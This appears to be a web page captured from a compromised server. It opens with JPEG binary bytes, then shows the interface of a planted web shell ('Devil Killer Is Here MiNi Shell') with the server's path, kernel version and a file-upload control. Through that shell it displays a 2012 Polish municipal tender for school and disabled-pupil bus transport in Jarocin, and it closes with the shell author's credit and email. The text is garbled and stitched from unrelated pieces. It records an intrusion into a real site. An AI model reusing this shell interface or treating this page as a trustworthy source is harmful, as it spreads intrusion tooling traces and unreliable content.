JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120718/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120718/157051-N-2012.html

<p class="kh_header"><b>Jarocin: Dowóz uczniów, w tym uczniów niepełnosprawnych do szkół podstawowych i gimnazjów na terenie Gminy Jarocin</b><br>
<b>Numer ogłoszenia: 157051 - 2012; data zamieszczenia: 18.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jarocin , Al. Niepodległości 10, 63-200 Jarocin, woj. wielkopolskie, tel. 62 7499500, faks 62 7472225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jarocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów, w tym uczniów niepełnosprawnych do szkół podstawowych i gimnazjów na terenie Gminy Jarocin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
a)	dowóz uczniów do szkół podstawowych i gimnazjów na terenie Gminy Jarocin bez opieki przewoźnika tj. do Gimnazjum w Witaszycach,  Szkoły Podstawowej 
w Golinie, Szkoły Podstawowej w Mieszkowie, Zespołu Szkół w Cielczy, Zespołu Szkół w Wilkowyi, 
b)	dowóz uczniów niepełnosprawnych z zapewnieniem opieki przez przewoźnika 
do Zespołu Szkół Nr 5 w Jarocinie, Publicznego Przedszkola Nr 5 w Jarocinie oraz Zespołu Szkół Specjalnych w Jarocinie.

Zgodnie z liniami tras dowóz uczniów do szkół na terenie Gminy Jarocin od dnia 03.09.2012 r. do 28.06.2013 r. odbywać się będzie w następujący sposób:
1.	Dowóz uczniów:
a)	dowóz do Gimnazjum w Witaszycach dla  16 uczniów, 
	1 przywóz wyjazd z Jarocina 7.25 na trasie Witaszyczki (las), Zakrzew, Franów,  Prusy, Roszkówko, Witaszyce godz. 8.05. 
	2  odwozy  na godz. 13.50 i na godz. 14.45 - trasa Witaszyce, Prusy, Roszkówko, Zakrzew, Franów, Witaszyczki (las), Jarocin, w dni pracy szkoły.  
	
	b) dowóz uczniów  do Szkoły Podstawowej w Golinie dla 16 uczniów,
	    1 przywóz na trasie Jarocin,  Siedlemin, Stefanów, Potarzyca, Golina na godz. 7.45  
	    oraz 2 odwozy - trasy:
	    1 odwóz  godz., 12.40 Golina, Stefanów, Potarzyca, Siedlemin, Jarocin
	    1 odwóz godz. 14.30 Golina, Potarzyca, Stefanów, Jarocin, 
	    w dni pracy szkoły,
	c) dowóz uczniów do Szkoły Podstawowej w Mieszkowie dla 45 uczniów,
	    1 przywóz  godz. 7.50  na trasie Radlin, Kąty, Radlin, Mieszków na godz. 8.05
	     oraz 2 odwozy  godz. 13.00 i godz.14.45 - trasa Mieszków, Radlin, Kąty, Radlin,
	    w dni pracy szkoły,
	
d)	  dowóz  uczniów do Zespołu Szkół w Cielczy  z Kątów, Radlina, Mieszkowa, Cielczy, Cząszczewa, Osieka dla 131 uczniów w dni pracy szkoły:
5  przywozów  godziny odjazdu 7.15 ,7.40, 7.15, 7.40, 9.10 na trasach:
	    Kąty, Radlin, Mieszków(ul. Radliniecka), Cielcza na godz. 7.35
	    Mieszków (ul. Dworcowa), Cielcza na godz. 7.55
	    Cielcza (osada),Cząszczew, Osiek, Mieszków, Cielcza  na godz. 7.35
	    Cząszczew, Osiek, Mieszków, Cielcza na godz. 7.55  
	    Cielcza, Cząszczew, Osiek, Mieszków, Cielcza na godz. 09.40 
	6 odwozów z Zespołu Szkół w Cielczy:
	    Cielcza, Cząszczew, Osiek, Mieszków na godz.12,40
	    Cielcza (osada), Cząszczew, Osiek, Mieszków na godz.13.35
	    Cielcza, Mieszków (ul. Dworcowa i ul. Radliniecka), Radlin, Kąty na godz. 14.30
	    Cielcza (osada), Cząszczew, Osiek, Mieszków na godz. 14.30
	Cielcza, Cząszczew, Osiek, Mieszków na godz. 15.25
	Cielcza (osada), Cząszczew, Osiek, Mieszków, Radlin, Kąty na godz. 16.20
	
a)	 dowóz uczniów do Zespołu Szkól w Wilkowyi tj. 73 uczniów:
	    2 przywozy wyjazd o godz. 6.40 i o godz. 7.40 na trasie:
	    Hilarów, Bachorzew, Tarce, Tarce Osiedle, Kadziak, Łuszczanów, Wilkowyja 
	    na godz. 7.20
	   Hilarów, Bachorzew, Tarce, Tarce Osiedle,  Kadziak, Łuszczanów, Wilkowyja 
	    na godz. 8.10
	2 odwozy z Zespołu Szkół w Wilkowyi - trasy na godz. 14.00 oraz na godz. 15.00:
	   Wilkowyja, Łuszczanów, Kadziak, Tarce, Tarce Osiedle, Bachorzew Hilarów,
	   w dni pracy szkoły.  
	
2.	Liczba dzienna obsługiwanych przewozów (dowóz uczniów) wynosi maksymalnie 490km. 
3.	 Dowóz uczniów niepełnosprawnych:
	a) dowóz uczniów do Zespołu  Szkół Nr 5 w Jarocinie z  Jarocina 20, Siedlemina 2, Goliny 3, Cząszczewa 1, Radlina 1, Cielczy 1, Hilarowa 1, Bachorzewa 2, tj. 31 uczniów.             
	 2 przywozy na godz. 7.45 pierwszy i na godz. 8.35 drugi, 
	 3 odwozy o godz. 13.30, 14.30, 15.20,
	  - w dni pracy szkoły.      
b)	dowóz dzieci do Publicznego Przedszkola nr 5 w Jarocinie z Jarocina 4, Cielczy 3,
	Mieszkowa 1  tj. 8 dzieci
	2 przywozy  pierwszy na godz. pomiędzy 8.00  - 9.00, drugi na godz. pomiędzy 12.00-13.00 
	2 odwozy  pierwszy godz. pomiędzy 12.00 - 13.00, drugi pomiędzy 16.00-17.00, 
	  	-  w dni pracy przedszkola,
	c)  dowóz uczniów do Zespołu Szkół Specjalnych w Jarocinie z Witaszyc 9, Zakrzewa 5, Roszkówka 1, Roszkowa 2, Bachorzewa 2, Annapola 2, Cielczy 6, Wilkowyi 2, Potarzycy 1, Jarocina 25 - tj. 55 uczniów:
	 6 dowozów na godz. 8.00 i 3 dowozy na godz. 10.40
	 8 odwozów - na godz. 12.30,13.00,13.15,14.45,15.30,15.50,16.30,16.30.
	
4.	Liczba dzienna obsługiwanych przewozów (dowóz uczniów niepełnosprawnych) wynosi maksymalnie  450 km.
5.	Szczegółowy plan dowozów uzgodniony będzie z dyrektorami placówek oświatowych przed rozpoczęciem roku szkolnego 2012/ 2013 i może ulec niewielkiej zmianie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.14.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, iż posiada licencję na wykonywanie krajowego transportu drogowego osób na podstawie ustawy z 6 września 2001 r. o transporcie drogowym (tekst jednolity: Dz. U. z 2007 r. Nr 125., poz. 874 z późn. zm.),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał należycie co najmniej:
a)	jedną usługę polegającą na dowozie uczniów do szkół podstawowych 
i gimnazjów o wartości nie mniejszej niż 250.000,00 zł brutto,
b)	jedną usługę polegającą na dowozie do szkół uczniów niepełnosprawnych o wartości nie mniejszej niż 180.000,00 zł  brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje  lub będzie dysponował:
a)	6 autobusami do przewozu uczniów ze szkół podstawowych i gimnazjów, posiadającymi normę emisji spalin do atmosfery na poziomie minimum Euro 4, 
b)	5 autobusami przystosowanymi do przewozu osób niepełnosprawnych, posiadającymi normę emisji spalin do atmosfery na poziomie minimum Euro 4,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował minimum 5 osobami,  które będą sprawowały opiekę nad dowożonymi uczniami, posiadającymi kwalifikacje pedagogiczne lub ukończony kurs dla opiekunów dowozu dzieci, ważne badania lekarskie, aktualne przeszkolenie w zakresie BHP i ppoż., w zakresie udzielania pierwszej pomocy oraz co najmniej 6 miesięczny okres doświadczenia w opiece nad osobą niepełnosprawną,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej prawidłowe wykonanie przedmiotu zamówienia poprzez posiadanie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 100 000,00 zł brutto</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. 2010r., Nr 113 poz. 759 z późn. zm.) Zamawiający przewiduje zmiany postanowień zawartej umowy 
w stosunku do treści oferty w następujących przypadkach:
1)	dopuszczalna jest zmiana umowy polegająca na zmianie osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialne za świadczenie usług. Przewoźnik może zmienić te osoby na prośbę tych osób oraz 
z przyczyn niezależnych od nich, tj. zdarzeń losowych (śmierć, choroba, zaginięcie, zwolnienie) przy czym osoby zastępujące pierwotnie wskazane osoby w potencjale kadrowym będą musiały posiadać uprawnienia nie gorsze od nich,
2)	dopuszczalna jest zmiana umowy polegająca na zmianie osób z powodu niewywiązywania  się tych osób z należytego wykonywania przedmiotu zamówienia oraz wystąpienia innych przyczyn niezależnych od wykonawcy (np. rezygnacji osób wskazanych do realizacji usług), skutkujących koniecznością zmiany osób przewidzianych do realizacji zamówienia. Warunkiem dopuszczenia nowych osób do realizacji zamówienia w ramach niniejszej umowy jest akceptacja Zamawiającego,
3)	dopuszczalna jest zmiana umowy polegająca na zmianie wynagrodzenia za przedmiot zamówienia w przypadku gdy ulegną zmianie powszechnie obowiązujące przepisy 
w zakresie wysokości stawki podatku od towarów i usług na przedmiot świadczenia,
4)	dopuszczalna jest zmiana umowy polegająca na zmianie danych Przewoźnika bez zmian samego Przewoźnika (np. zmiana siedziby, adresu, nazwy),
5)	Zamawiający przewiduje możliwość zmiany terminu wykonania poszczególnych elementów przedmiotu umowy, jeżeli dochowanie terminu określonego w umowie jest niemożliwe z uwagi na siłę wyższą lub inne okoliczności niezależne od stron umowy lub których strony umowy przy zachowaniu należytej staranności nie były w stanie uniknąć i przewidzieć</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jarocin.pl    - (zakładka BIP)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jarociński Fundusz Poręczeń Kredytowych Sp. z o.o., ul. T. Kościuszki 15B, 63-200 Jarocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2012 godzina 10:00, miejsce: Urząd Miejski w Jarocinie, ul. Al. Niepodległości 10 - Sekretariat, pok. nr 32, 63-200 Jarocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com